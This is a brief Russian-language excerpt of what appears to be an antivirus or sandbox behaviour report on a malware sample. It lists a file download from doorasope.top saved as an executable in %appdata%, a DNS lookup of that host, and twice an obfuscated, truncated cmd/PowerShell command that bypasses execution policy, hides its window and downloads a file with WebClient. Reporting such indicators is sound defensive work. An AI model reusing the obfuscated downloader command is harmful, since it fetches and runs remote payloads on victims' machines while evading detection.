Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Owe^Rsh^ElL^.e^x^e ^-exeCUtIoN^P^oLIcy ^BY^paSs -^NOP^RofIL^E^ -^WiND^owstyLE^ H^id^De^n (NE^w-^Ob^JEc^T Sy^ST^e^m.N^E^t.wE^bc^li^EN^t)^.^D^oWN^L^O^Adf^I^LE(^'http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^Owe^Rsh^ElL^.e^x^e ^-exeCUtIoN^P^oLIcy ^BY^paSs -^NOP^RofIL^E^ -^WiND^owstyLE^ H^id^De^n (NE^w-^Ob^JEc^T Sy^ST^e^m.N^E^t.wE^bc^li^EN^t)^.^D^oWN^L^O^Adf^I^LE(^'http://www.doo...' (со скрытым окном)